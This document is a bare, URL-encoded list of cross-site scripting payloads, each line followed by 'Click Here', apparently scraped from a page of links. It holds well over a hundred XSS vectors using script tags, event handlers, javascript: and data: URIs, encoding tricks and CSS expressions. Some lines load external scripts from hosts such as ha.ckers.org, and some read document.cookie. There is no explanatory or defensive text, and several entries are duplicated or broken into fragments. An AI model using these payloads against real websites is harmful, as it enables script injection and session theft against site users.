%3cmath%3e%3ca%20xlink%3ahref%3d%22%2f%2fjsfiddle%2enet%2ft846h%2f%22%3eclickClick Here

%3ciframe%20src%3d%22data%3atext%2fhtml,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E%22%3e%3c%2fiframe%3eClick Here

%3b%20alert(1)%3bClick Here

)alert(1)%3b%2f%2fClick Here

%3cIMG%20SRC%3djavascript%3aalert(XSS)%3b%3eClick Here

%3cIMG%20SRC%3djAVasCrIPt%3aalert(XSS)%3eClick Here

%3cScRiPt%3ealert(1)%3c%2fsCriPt%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert(%26quot%3bXSS%26quot%3b)%3eClick Here

%3cimg%20src%3dxss%20onerror%3dalert(1)%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert(XSS)%3e%20%20%20%20%20%20Click Here

%3ciframe%20%00%20src%3d%22%26Tab%3bjavascript%3aprompt(1)%26Tab%3b%22%00%3eClick Here

%3csvg%3e%3cstyle%3e%7bfont-family%26colon%3b'%3ciframe%2fonload%3dconfirm(1)%3e'Click Here

%3cinput%2fonmouseover%3d%22javaSCRIPT%26colon%3bconfirm%26lpar%3b1%26rpar%3b%22Click Here

%3csVg%3e%3cscRipt%20%00%3ealert%26lpar%3b1%26rpar%3b%20%7bOpera%7dClick Here

%3cimg%2fsrc%3d%60%00%60%20onerror%3dthis%2eonerror%3dconfirm(1)Click Here

%3cform%3e%3cisindex%20formaction%3d%22javascript%26colon%3bconfirm(1)%22Click Here

%3cscript%2f%26Tab%3b%20src%3d'https%3a%2f%2fdl%2edropbox%2ecom%2fu%2f13018058%2fjs%2ejs'%20%2f%26Tab%3b%3e%3c%2fscript%3eClick Here

%3cScRipT%205-0%2a3%2b9%2f3%3d%3eprompt(1)%3c%2fScRipT%20giveanswerhere%3d%3fClick Here

%3ciframe%2fsrc%3d%22data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d%22%3eClick Here

%3cimg%20src%3d%60%00%60%26NewLine%3b%20onerror%3dalert(1)%26NewLine%3bClick Here

%3cscript%20%2f%2a%00%2a%2f%3e%2f%2a%00%2a%2falert(1)%2f%2a%00%2a%2f%3c%2fscript%20%2f%2a%00%2a%2fClick Here

%3ciframe%2fsrc%3d%22data%3atext%2fhtml,%3csvg%20%26%23111%3b%26%23110%3bload%3dalert(1)%3e%22%3eClick Here

%26%2334%3b%26%2362%3b%3ch1%2fonmouseover%3d'%5cu0061lert(1)'%3e%00Click Here

%3cmeta%20content%3d%22%26NewLine%3b%201%20%26NewLine%3b%3b%20JAVASCRIPT%26colon%3b%20alert(1)%22%20http-equiv%3d%22refresh%22%2f%3eClick Here

%3csvg%3e%3cscript%20xlink%3ahref%3ddata%26colon%3b,window%2eopen('https%3a%2f%2fwww%2egoogle%2ecom%2f')%3e%3c%2fscriptClick Here

%3cmeta%20http-equiv%3d%22refresh%22%20content%3d%220%3burl%3djavascript%3aconfirm(1)%22%3eClick Here

%3ciframe%20src%3djavascript%26colon%3balert%26lpar%3bdocument%26period%3blocation%26rpar%3b%3eClick Here

%3c%2fscript%3e%3cimg%2f%2a%00%2fsrc%3d%22worksinchrome%26colon%3bprompt%26%23x28%3b1%26%23x29%3b%22%2f%00%2a%2fonerror%3d'eval(src)'%3eClick Here

%3csvg%3e%3cscript%20x%3ahref%3d'https%3a%2f%2fdl%2edropbox%2ecom%2fu%2f13018058%2fjs%2ejs'%20%7bOpera%7dClick Here

%3cimg%2f%26%2309%3b%26%2310%3b%26%2311%3b%20src%3d%60~%60%20onerror%3dprompt(1)%3eClick Here

%3cform%3e%3ca%20href%3d%22javascript%3a%5cu0061lert%26%23x28%3b1%26%23x29%3b%22%3eXClick Here

%3cform%3e%3ciframe%20%26%2309%3b%26%2310%3b%26%2311%3b%20src%3d%22javascript%26%2358%3balert(1)%22%26%2311%3b%26%2310%3b%26%2309%3b%3b%3eClick Here

%3ca%20href%3d%22data%3aapplication%2fx-x509-user-cert%3b%26NewLine%3bbase64%26NewLine%3b,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg%3d%3d%22%26%2309%3b%26%2310%3b%26%2311%3b%3eX%3c%2faClick Here

http%3a%2f%2fwww%2egoogle%3cscript%20%2ecom%3ealert(document%2elocation)%3c%2fscriptClick Here

%3ca%26%2332%3bhref%26%2361%3b%26%2391%3b%26%2300%3b%26%2393%3b%22%26%2300%3b%20onmouseover%3dprompt%26%2340%3b1%26%2341%3b%26%2347%3b%26%2347%3b%22%3eXYZ%3c%2faClick Here

%3cimg%2fsrc%3d@%26%2332%3b%26%2313%3b%20onerror%20%3d%20prompt('%26%2349%3b')Click Here

%3cscript%20%5e__%5e%3ealert(String%2efromCharCode(49))%3c%2fscript%20%5e__%5eClick Here

%3cstyle%2fonload%3dprompt%26%2340%3b'%26%2388%3b%26%2383%3b%26%2383%3b'%26%2341%3bClick Here

%26%2300%3b%3c%2fform%3e%3cinput%20type%26%2361%3b%22date%22%20onfocus%3d%22alert(1)%22%3eClick Here

%3c%2fstyle%20%26%2332%3b%3e%3cscript%20%26%2332%3b%20%3a-(%3e%2f%2a%2a%2falert(document%2elocation)%2f%2a%2a%2f%3c%2fscript%20%26%2332%3b%20%3a-(Click Here

%3cform%3e%3ctextarea%20%26%2313%3b%20onkeyup%3d'%5cu0061%5cu006C%5cu0065%5cu0072%5cu0074%26%23x28%3b1%26%23x29%3b'%3eClick Here

%3cscript%20%2f%2a%2a%2a%2f%3e%2f%2a%2a%2a%2fconfirm('%5cuFF41%5cuFF4C%5cuFF45%5cuFF52%5cuFF54%5cu1455%5cuFF11%5cu1450')%2f%2a%2a%2a%2f%3c%2fscript%20%2f%2a%2a%2a%2fClick Here

%3ciframe%20srcdoc%3d'%26lt%3bbody%20onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b'%3eClick Here

%3cscript%20~~~%3ealert(0%0)%3c%2fscript%20~~~%3eClick Here

%3ca%20href%3d%22javascript%3avoid(0)%22%20onmouseover%3d%26NewLine%3bjavascript%3aalert(1)%26NewLine%3b%3eX%3c%2fa%3eClick Here

%3cstyle%2fonload%3d%26lt%3b!--%26%2309%3b%26gt%3b%26%2310%3balert%26%2310%3b%26lpar%3b1%26rpar%3b%3eClick Here

%3c%2f%2f%2fstyle%2f%2f%2f%3e%3cspan%20%2F%20onmousemove%3d'alert%26lpar%3b1%26rpar%3b'%3eSPANClick Here

%26%2334%3b%26%2362%3b%3csvg%3e%3cstyle%3e%7b-o-link-source%26colon%3b'%3cbody%2fonload%3dconfirm(1)%3e'Click Here

%3cimg%2fsrc%3d'http%3a%2f%2fi%2eimgur%2ecom%2fP8mL8%2ejpg'%20onmouseover%3d%26Tab%3bprompt(1)Click Here

%26%2313%3b%3cblink%2f%26%2313%3b%20onmouseover%3dpr%26%23x6F%3bmp%26%23116%3b(1)%3eOnMouseOver%20%7bFirefox%20%26%20Opera%7dClick Here

%3cmarquee%20onstart%3d'javascript%3aalert%26%23x28%3b1%26%23x29%3b'%3e%5e__%5eClick Here

%3cdiv%2fstyle%3d%22width%3aexpression(confirm(1))%22%3eX%3c%2fdiv%3e%20%7bIE7%7dClick Here

%3ciframe%2f%00%2f%20src%3djavaSCRIPT%26colon%3balert(1)Click Here

%2f%2f%3cform%2faction%3djavascript%26%23x3A%3balert%26lpar%3bdocument%26period%3bcookie%26rpar%3b%3e%3cinput%2ftype%3d'submit'%3e%2f%2fClick Here

%2f%2aiframe%2fsrc%2a%2f%3ciframe%2fsrc%3d%22%3ciframe%2fsrc%3d@%22%2fonload%3dprompt(1)%20%2f%2aiframe%2fsrc%2a%2f%3eClick Here

%2f%2f%7c%5c%5c%20%3cscript%20%2f%2f%7c%5c%5c%20src%3d'https%3a%2f%2fdl%2edropbox%2ecom%2fu%2f13018058%2fjs%2ejs'%3e%20%2f%2f%7c%5c%5c%20%3c%2fscript%20%2f%2f%7c%5c%5cClick Here

%3c%2ffont%3e%2f%3csvg%3e%3cstyle%3e%7bsrc%26%23x3A%3b'%3cstyle%2fonload%3dthis%2eonload%3dconfirm(1)%3e'%3c%2ffont%3e%2f%3c%2fstyle%3eClick Here

%3c%2fplaintext%5c%3e%3c%2f%7c%5c%3e%3cplaintext%2fonmouseover%3dprompt(1)Click Here

%3ca%2fhref%3d%22javascript%3a%26%2313%3b%20javascript%3aprompt(1)%22%3e%3cinput%20type%3d%22X%22%3eClick Here

%3c%2fsvg%3e''%3csvg%3e%3cscript%20'AQuickBrownFoxJumpsOverTheLazyDog'%3ealert%26%23x28%3b1%26%23x29%3b%20%7bOpera%7dClick Here

%3ca%20href%3d%22javascript%26colon%3b%5cu0061%26%23x6C%3b%26%23101%72t%26lpar%3b1%26rpar%3b%22%3e%3cbutton%3eClick Here

%3ciframe%20style%3d%22xg-p%3aabsolute%3btop%3a0%3bleft%3a0%3bwidth%3a100%%3bheight%3a100%%22%20onmouseover%3d%22prompt(1)%22%3eClick Here

%3cdiv%20onmouseover%3d'alert%26lpar%3b1%26rpar%3b'%3eDIV%3c%2fdiv%3eClick Here

%3cembed%20src%3d%22http%3a%2f%2fcorkami%2egooglecode%2ecom%2fsvn%2f!svn%2fbc%2f480%2ftrunk%2fmisc%2fpdf%2fhelloworld_js_X%2epdf%22%3eClick Here

%3cobject%20data%3d%22http%3a%2f%2fcorkami%2egooglecode%2ecom%2fsvn%2f!svn%2fbc%2f480%2ftrunk%2fmisc%2fpdf%2fhelloworld_js_X%2epdf%22%3eClick Here

%3ca%20href%3d%22jAvAsCrIpT%26colon%3balert%26lpar%3b1%26rpar%3b%22%3eX%3c%2fa%3eClick Here

%3cvar%20onmouseover%3d%22prompt(1)%22%3eOn%20Mouse%20Over%3c%2fvar%3eClick Here

%3ca%20href%3djavascript%26colon%3balert%26lpar%3bdocument%26period%3bcookie%26rpar%3b%3eClick%20Here%3c%2fa%3eClick Here

%3c%%3c!--'%%3e%3cscript%3ealert(1)%3b%3c%2fscript%20--%3eClick Here

%3cimg%20src%3d%22%2f%22%20%3d_%3d%22%20title%3d%22onerror%3d'prompt(1)'%22%3eClick Here

%3cscript%20src%3d%22data%3atext%2fjavascript,alert(1)%22%3e%3c%2fscript%3eClick Here

%3ciframe%2fsrc%20%5c%2f%5c%2fonload%20%3d%20prompt(1)Click Here

%3ciframe%2fonreadystatechange%3dalert(1)Click Here

%3csvg%2fonload%3dalert(1)Click Here

%3cinput%20type%3d%22text%22%20value%3d%60%60%20%3cdiv%2fonmouseover%3d'alert(1)'%3eX%3c%2fdiv%3eClick Here

%3cinput%20value%3d%3c%3e%3ciframe%2fsrc%3djavascript%3aconfirm(1)Click Here

%3csvg%3e%3cscript%20%3f%3ealert(1)Click Here

http%3a%2f%2fwww%2e%3cscript%3ealert(1)%3c%2fscript%20%2ecomClick Here

%3ciframe%20src%3dj%26Tab%3ba%26Tab%3bv%26Tab%3ba%26Tab%3bs%26Tab%3bc%26Tab%3br%26Tab%3bi%26Tab%3bp%26Tab%3bt%26Tab%3b%3aa%26Tab%3bl%26Tab%3be%26Tab%3br%26Tab%3bt%26Tab%3b%28%26Tab%3b1%26Tab%3b%29%3e%3c%2fiframe%3eClick Here

%3cimg%20src%3d%60xx%3axx%60onerror%3dalert(1)%3eClick Here

%3cmeta%20http-equiv%3d%22refresh%22%20content%3d%220%3bjavascript%26colon%3balert(1)%22%2f%3eClick Here

%3cembed%20code%3d%22http%3a%2f%2fbusinessinfo%2eco%2euk%2flabs%2fxss%2fxss%2eswf%22%20allowscriptaccess%3dalways%3eClick Here

%3cmath%3e%3ca%20xlink%3ahref%3d%22%2f%2fjsfiddle%2enet%2ft846h%2f%22%3eclickClick Here

%3csvg%20contentScriptType%3dtext%2fvbs%3e%3cscript%3eMsgBox%2b1Click Here

%3cscript%3e~'%5cu0061'%20%3b%20%5cu0074%5cu0068%5cu0072%5cu006F%5cu0077%20~%20%5cu0074%5cu0068%5cu0069%5cu0073%2e%20%5cu0061%5cu006C%5cu0065%5cu0072%5cu0074(~'%5cu0061')%3c%2fscript%20U%2bClick Here

%3ca%20href%3d%22data%3atext%2fhtml%3bbase64_,%3csvg%2fonload%3d%5cu0061%26%23x6C%3b%26%23101%72t(1)%3e%22%3eX%3c%2faClick Here

%3ciframe%2fonreadystatechange%3d%5cu0061%5cu006C%5cu0065%5cu0072%5cu0074('%5cu0061')%20worksinIE%3eClick Here

%3cscript%2fsrc%3d%22data%26colon%3btext%2Fj%5cu0061v%5cu0061script,%5cu0061lert('%5cu0061')%22%3e%3c%2fscript%20a%3d%5cu0061%20%26%20%2f%3d%2FClick Here

%3cscript%2fsrc%3ddata%26colon%3btext%2fj%5cu0061v%5cu0061%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116,%5cu0061%6C%65%72%74(%2fXSS%2f)%3e%3c%2fscriptClick Here

%3cobject%20data%3djavascript%26colon%3b%5cu0061%26%23x6C%3b%26%23101%72t(1)%3eClick Here

%3cscript%3e%2b-%2b-1-%2b-%2balert(1)%3c%2fscript%3eClick Here

%3cscript%20itworksinallbrowsers%3e%2f%2a%3cscript%2a%20%2a%2falert(1)%3c%2fscriptClick Here

%3cbody%2fonload%3d%26lt%3b!--%26gt%3b%26%2310alert(1)%3eClick Here

%3cimg%20src%20%3fitworksonchrome%3f%5c%2fonerror%20%3d%20alert(1)Click Here

%3csvg%3e%3cscript%20onlypossibleinopera%3a-)%3e%20alert(1)Click Here

%3csvg%3e%3cscript%3e%2f%2f%26NewLine%3bconfirm(1)%3b%3c%2fscript%20%3c%2fsvg%3eClick Here

%3cscript%20x%3e%20alert(1)%20%3c%2fscript%201%3d2Click Here

%3ca%20aa%20aaa%20aaaa%20aaaaa%20aaaaaa%20aaaaaaa%20aaaaaaaa%20aaaaaaaaa%20aaaaaaaaaa%20href%3dj%26%2397v%26%2397script%26%23x3A%3b%26%2397lert(1)%3eClickMeClick Here

%3cdiv%2fonmouseover%3d'alert(1)'%3e%20style%3d%22x%3a%22%3eClick Here

%3c--%60%3cimg%2fsrc%3d%60%20onerror%3dalert(1)%3e%20--!%3eClick Here

%3cdiv%20style%3d%22xg-p%3aabsolute%3btop%3a0%3bleft%3a0%3bwidth%3a100%%3bheight%3a100%%22%20onmouseover%3d%22prompt(1)%22%20onclick%3d%22alert(1)%22%3ex%3c%2fbutton%3eClick Here

%3cform%3e%3cbutton%20formaction%3djavascript%26colon%3balert(1)%3eCLICKMEClick Here

%22%3e%3cimg%20src%3dx%20onerror%3dwindow%2eopen('https%3a%2f%2fwww%2egoogle%2ecom%2f')%3b%3eClick Here

%3cobject%20data%3ddata%3atext%2fhtml%3bbase64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik%2b%3e%3c%2fobject%3eClick Here

%3cmath%3e%3ca%20xlink%3ahref%3d%22%2f%2fjsfiddle%2enet%2ft846h%2f%22%3eclickClick Here

%3ciframe%20src%3d%22data%3atext%2fhtml,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E%22%3e%3c%2fiframe%3eClick Here

%3cSCRIPT%3eString%2efromCharCode(97,%20108,%20101,%20114,%20116,%2040,%2049,%2041)%3c%2fSCRIPT%3eClick Here

%3cIMG%20%3e%3cSCRIPT%3ealert(XSS)%3c%2fSCRIPT%3e%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert(String%2efromCharCode(88,83,83))%3eClick Here

%3cIMG%20SRC%3djav%20ascript%3aalert(XSS)%3b%3eClick Here

%3c%3cSCRIPT%3ealert(XSS)%3b%2f%2f%3c%3c%2fSCRIPT%3eClick Here

%3cIMG%20SRC%3djav%26%23x09%3bascript%3aalert(XSS)%3b%3eClick Here

%3e%3cs%2bcript%3ealert(document%2ecookie)%3c%2fscript%3eClick Here

%253cscript%253ealert(1)%253c%2fscript%253eClick Here

foo%3cscript%3ealert(1)%3c%2fscript%3eClick Here

%3cscr%3cscript%3eipt%3ealert(1)%3c%2fscr%3c%2fscript%3eipt%3eClick Here

%3cBODY%20BACKGROUND%3djavascript%3aalert(XSS)%3eClick Here

%3cIMG%20SRC%3d%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3eClick Here

%3cBODY%20ONLOAD%3dalert(XSS)%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert(XSS)Click Here

%3ciframe%20src%3dhttp%3a%2f%2fha%2eckers%2eorg%2fscriptlet%2ehtml%20%3cClick Here

javascript%3aalert(%22hellox%20worldss%22)Click Here

%3cINPUT%20TYPE%3dIMAGE%20SRC%3djavascript%3aalert(XSS)%3b%3eClick Here

%3cimg%20src%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cimg%20src%3djavascript%3aalert(%26quot%3bXSS%26quot%3b)%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3burl%3ddata%3atext%2fhtml%3bbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3eClick Here

%3cIFRAME%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3e%3c%2fIFRAME%3eClick Here

%3cSCRIPT%20a%3d%22%3e%22%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20a%3d%22%3e%22%20''%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20%22a%3d'%3e'%22%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%3edocument%2ewrite(%22%3cSCRI%22)%3b%3c%2fSCRIPT%3ePT%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3c%3cSCRIPT%3ealert(%22XSS%22)%3b%2f%2f%3c%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20a%3d%22%3e'%3e%22%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cscript%3ealert(%22hellox%20worldss%22)%3c%2fscript%3e%26safe%3dhigh%26cx%3d006665157904466893121%3asu_tzknyxug%26cof%3dFORID%3a9%23510Click Here

%3cscript%3ealert(%22XSS%22)%3b%3c%2fscript%3e%26search%3d1Click Here

%3ch1%3e%3cfont%20color%3dblue%3ehellox%20worldss%3c%2fh1%3eClick Here

%3cBODY%20ONLOAD%3dalert('hellox%20worldss')%3eClick Here

%3cinput%20onfocus%3dwrite(XSS)%20autofocus%3eClick Here

%3cinput%20onblur%3dwrite(XSS)%20autofocus%3e%3cinput%20autofocus%3eClick Here

%3cbody%20onscroll%3dalert(XSS)%3e%3cbr%3e%3cbr%3e%3cbr%3e%3cbr%3e%3cbr%3e%3cbr%3e%2e%2e%2e%3cbr%3e%3cbr%3e%3cbr%3e%3cbr%3e%3cinput%20autofocus%3eClick Here

%3cform%3e%3cbutton%20formaction%3d%22javascript%3aalert(XSS)%22%3elolClick Here

%3c!--%3cimg%20src%3d%22--%3e%3cimg%20src%3dx%20onerror%3dalert(XSS)%2f%2f%22%3eClick Here

%3cstyle%3e%3cimg%20src%3d%22%3c%2fstyle%3e%3cimg%20src%3dx%20onerror%3dalert(XSS)%2f%2f%22%3eClick Here

%3c![%3e%3cimg%20src%3d%22]%3e%3cimg%20src%3dx%20onerror%3dalert(XSS)%2f%2f%22%3eClick Here

%3c!%20foo%3d%22%3e%3cscript%3ealert(1)%3c%2fscript%3e%22%3eClick Here

%3c%3f%20foo%3d%22%3e%3cscript%3ealert(1)%3c%2fscript%3e%22%3eClick Here

%3c%2f%20foo%3d%22%3e%3cscript%3ealert(1)%3c%2fscript%3e%22%3eClick Here

%3c%3f%20foo%3d%22%3e%3cx%20foo%3d'%3f%3e%3cscript%3ealert(1)%3c%2fscript%3e'%3e%22%3eClick Here

%3c!%20foo%3d%22[[[Inception]]%22%3e%3cx%20foo%3d%22]foo%3e%3cscript%3ealert(1)%3c%2fscript%3e%22%3eClick Here

%3c%%20foo%3e%3cx%20foo%3d%22%%3e%3cscript%3ealert(123)%3c%2fscript%3e%22%3eClick Here

%3cdiv%20style%3d%22font-family%3a'foo%26%2310%3b%3bcolor%3ared%3b'%3b%22%3eLOLClick Here

LOL%3cstyle%3e%2a%7b%2f%2aall%2a%2fcolor%2f%2aall%2a%2f%3a%2f%2aall%2a%2fred%2f%2aall%2a%2f%3b%2f[0]%2aIE,Safari%2a[0]%2fcolor%3agreen%3bcolor%3abl%2f%2aIE%2a%2fue%3b%7d%3c%2fstyle%3eClick Here

%3cscript%3e(%7b0%3a%230%3dalert%2f%230%23%2f%230%23(0)%7d)%3c%2fscript%3eClick Here

%3csvg%20xmlns%3d%22http%3a%2f%2fwww%2ew3%2eorg%2f2000%2fsvg%22%3eLOL%3cscript%3ealert(123)%3c%2fscript%3e%3c%2fsvg%3eClick Here

%26lt%3bSCRIPT%26gt%3balert(%2fXSS%2f%26%2346%3bsource)%26lt%3b%2fSCRIPT%26gt%3bClick Here

%5c%5c%22%3balert('XSS')%3b%2f%2fClick Here

%26lt%3b%2fTITLE%26gt%3b%26lt%3bSCRIPT%26gt%3balert(%5c%22XSS%5c%22)%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3bINPUT%20TYPE%3d%5c%22IMAGE%5c%22%20SRC%3d%5c%22javascript%26%23058%3balert('XSS')%3b%5c%22%26gt%3bClick Here

%26lt%3bBODY%20BACKGROUND%3d%5c%22javascript%26%23058%3balert('XSS')%5c%22%26gt%3bClick Here

%26lt%3bBODY%20ONLOAD%3dalert('XSS')%26gt%3bClick Here

%26lt%3bIMG%20DYNSRC%3d%5c%22javascript%26%23058%3balert('XSS')%5c%22%26gt%3bClick Here

%26lt%3bIMG%20LOWSRC%3d%5c%22javascript%26%23058%3balert('XSS')%5c%22%26gt%3bClick Here

%26lt%3bBR%20SIZE%3d%5c%22%26%7balert('XSS')%7d%5c%22%26gt%3bClick Here

%26lt%3bBGSOUND%20SRC%3d%5c%22javascript%26%23058%3balert('XSS')%3b%5c%22%26gt%3bClick Here

%26lt%3bLAYER%20SRC%3d%5c%22http%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fscriptlet%26%2346%3bhtml%5c%22%26gt%3b%26lt%3b%2fLAYER%26gt%3bClick Here

%26lt%3bLINK%20REL%3d%5c%22stylesheet%5c%22%20HREF%3d%5c%22javascript%26%23058%3balert('XSS')%3b%5c%22%26gt%3bClick Here

%26lt%3bLINK%20REL%3d%5c%22stylesheet%5c%22%20HREF%3d%5c%22http%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fxss%26%2346%3bcss%5c%22%26gt%3bClick Here

%26lt%3bSTYLE%26gt%3b@import'http%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fxss%26%2346%3bcss'%3b%26lt%3b%2fSTYLE%26gt%3bClick Here

%26lt%3bMETA%20HTTP-EQUIV%3d%5c%22Link%5c%22%20Content%3d%5c%22%26lt%3bhttp%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fxss%26%2346%3bcss%26gt%3b%3b%20REL%3dstylesheet%5c%22%26gt%3bClick Here

%26lt%3bXSS%20STYLE%3d%5c%22behavior%26%2358%3b%20url(xss%26%2346%3bhtc)%3b%5c%22%26gt%3bClick Here

%26lt%3bSTYLE%26gt%3bli%20%7blist-style-image%26%2358%3b%20url(%5c%22javascript%26%23058%3balert('XSS')%5c%22)%3b%7d%26lt%3b%2fSTYLE%26gt%3b%26lt%3bUL%26gt%3b%26lt%3bLI%26gt%3bXSSClick Here

%26lt%3bSTYLE%26gt%3bBODY%7b-moz-binding%26%2358%3burl(%5c%22http%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fxssmoz%26%2346%3bxml%23xss%5c%22)%7d%26lt%3b%2fSTYLE%26gt%3bClick Here

%26lt%3bIMG%20SRC%3d'vbscript%26%23058%3bmsgbox(%5c%22XSS%5c%22)'%26gt%3bClick Here

%26lt%3bIMG%20SRC%3d%5c%22mocha%26%2358%3b%26%2391%3bcode%26%2393%3b%5c%22%26gt%3bClick Here

%26lt%3bMETA%20HTTP-EQUIV%3d%5c%22refresh%5c%22%20CONTENT%3d%5c%220%3burl%3djavascript%26%23058%3balert('XSS')%3b%5c%22%26gt%3bClick Here

~scriptualert(EXSSE)~%2fscriptuClick Here

%26lt%3bIMG%20SRC%3d%5c%22livescript%26%23058%3b%26%2391%3bcode%26%2393%3b%5c%22%26gt%3bClick Here

%26lt%3bMETA%20HTTP-EQUIV%3d%5c%22refresh%5c%22%20CONTENT%3d%5c%220%3burl%3ddata%26%2358%3btext%2fhtml%3bbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%5c%22%26gt%3bClick Here

%26lt%3bMETA%20HTTP-EQUIV%3d%5c%22refresh%5c%22%20CONTENT%3d%5c%220%3b%20URL%3dhttp%26%2358%3b%2f%2f%3bURL%3djavascript%26%23058%3balert('XSS')%3b%5c%22Click Here

%26lt%3bIFRAME%20SRC%3d%5c%22javascript%26%23058%3balert('XSS')%3b%5c%22%26gt%3b%26lt%3b%2fIFRAME%26gt%3bClick Here

%26lt%3bTABLE%20BACKGROUND%3d%5c%22javascript%26%23058%3balert('XSS')%5c%22%26gt%3bClick Here

%26lt%3bFRAMESET%26gt%3b%26lt%3bFRAME%20SRC%3d%5c%22javascript%26%23058%3balert('XSS')%3b%5c%22%26gt%3b%26lt%3b%2fFRAMESET%26gt%3bClick Here

%26lt%3bTABLE%26gt%3b%26lt%3bTD%20BACKGROUND%3d%5c%22javascript%26%23058%3balert('XSS')%5c%22%26gt%3bClick Here

%26lt%3bDIV%20STYLE%3d%5c%22background-image%26%2358%3b%20url(javascript%26%23058%3balert('XSS'))%5c%22%26gt%3bClick Here

%26lt%3bDIV%20STYLE%3d%5c%22background-image%26%2358%3b%20url(javascript%26%23058%3balert('XSS'))%5c%22%26gt%3bClick Here

%26lt%3bDIV%20STYLE%3d%5c%22width%26%2358%3b%20expression(alert('XSS'))%3b%5c%22%26gt%3bClick Here

%26lt%3bSTYLE%26gt%3b@im%5cport'%5cja%5cvasc%5cript%26%2358%3balert(%5c%22XSS%5c%22)'%3b%26lt%3b%2fSTYLE%26gt%3bClick Here

%26lt%3bIMG%20STYLE%3d%5c%22xss%26%2358%3bexpr%2f%2aXSS%2a%2fession(alert('XSS'))%5c%22%26gt%3bClick Here

exp%2f%2a%26lt%3bA%20STYLE%3d'no%5cxss%26%2358%3bnoxss(%5c%22%2a%2f%2f%2a%5c%22)%3bClick Here

xss%26%2358%3bex%26%23x2F%3b%2aXSS%2a%2f%2f%2a%2f%2a%2fpression(alert(%5c%22XSS%5c%22))'%26gt%3bClick Here

%26lt%3bSTYLE%20TYPE%3d%5c%22text%2fjavascript%5c%22%26gt%3balert('XSS')%3b%26lt%3b%2fSTYLE%26gt%3bClick Here

%26lt%3bXSS%20STYLE%3d%5c%22xss%26%2358%3bexpression(alert('XSS'))%5c%22%26gt%3bClick Here

%26lt%3bSTYLE%26gt%3b%26%2346%3bXSS%7bbackground-image%26%2358%3burl(%5c%22javascript%26%23058%3balert('XSS')%5c%22)%3b%7d%26lt%3b%2fSTYLE%26gt%3b%26lt%3bA%20CLASS%3dXSS%26gt%3b%26lt%3b%2fA%26gt%3bClick Here

%26lt%3bSTYLE%20type%3d%5c%22text%2fcss%5c%22%26gt%3bBODY%7bbackground%26%2358%3burl(%5c%22javascript%26%23058%3balert('XSS')%5c%22)%7d%26lt%3b%2fSTYLE%26gt%3bClick Here

%26lt%3b!--%26%2391%3bif%20gte%20IE%204%26%2393%3b%26gt%3bClick Here

%26lt%3bSCRIPT%26gt%3balert('XSS')%3b%26lt%3b%2fSCRIPT%26gt%3bClick Here

%26lt%3b!%26%2391%3bendif%26%2393%3b--%26gt%3bClick Here

%26lt%3bBASE%20HREF%3d%5c%22javascript%26%23058%3balert('XSS')%3b%2f%2f%5c%22%26gt%3bClick Here

%26lt%3bOBJECT%20TYPE%3d%5c%22text%2fx-scriptlet%5c%22%20DATA%3d%5c%22http%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fscriptlet%26%2346%3bhtml%5c%22%26gt%3b%26lt%3b%2fOBJECT%26gt%3bClick Here

%26lt%3bOBJECT%20classid%3dclsid%26%2358%3bae24fdae-03c6-11d1-8b76-0080c744f389%26gt%3b%26lt%3bparam%20name%3durl%20value%3djavascript%26%23058%3balert('XSS')%26gt%3b%26lt%3b%2fOBJECT%26gt%3bClick Here

%26lt%3bEMBED%20SRC%3d%5c%22http%26%2358%3b%2f%2fha%26%2346%3bckers%26%2346%3borg%2fxss%26%2346%3bswf%5c%22%20AllowScriptAccess%3d%5c%22always%5c%22%26gt%3b%26lt%3b%2fEMBED%26gt%3bClick Here

b%3d%5c%22URL(%5c%5c%22%5c%22%3bClick Here

a%3d%5c%22get%5c%22%3bClick Here

c%3d%5c%22javascript%26%23058%3b%5c%22%3bClick Here

d%3d%5c%22alert('XSS')%3b%5c%5c%22)%5c%22%3bClick Here

eval(a%2bb%2bc%2bd)%3bClick Here

